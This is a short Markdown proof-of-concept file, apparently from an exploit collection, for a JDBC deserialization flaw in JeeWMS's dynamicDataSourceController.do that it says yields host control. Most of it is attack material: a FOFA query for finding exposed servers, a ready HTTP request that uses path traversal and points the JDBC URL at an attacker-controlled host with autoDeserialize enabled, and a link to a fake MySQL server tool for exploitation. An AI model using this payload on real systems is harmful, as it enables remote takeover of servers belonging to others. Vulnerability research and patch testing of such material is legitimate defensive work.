POC/wpoc/JEEWMS/JEEWMS系统dynamicDataSourceController.do存在JDBC反序列化漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

22 lines
1.0 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# JEEWMS系统dynamicDataSourceController.do存在JDBC反序列化漏洞
JeeWMS是一款免费开源的仓库管理系统支持3PL和厂内物流涵盖订单管理仓储管理计费管理现场作业RFIDAGV等功能。本文介绍了系统的简介功能安装截图和链接适合仓储企业和开发者参考。厦门市灵鹿谷科技有限公司JEEWMS dynamicDataSourceController.do JDBC反序列化漏洞导致攻击者可以获取系统主机权限
## fofa
```javascript
body="plug-in/lhgDialog/lhgdialog.min.js?skin=metro"
```
## poc
```javascript
GET /rest/../dynamicDataSourceController.do?testConnection&driverClass=com.mysql.jdbc.Driver&url=jdbc:mysql://{{tempdns}}/test?detectCustomCollations=true%26autoDeserialize=true&dbUser=test_user HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
```
利用工具https://github.com/fnmsd/MySQL_Fake_Server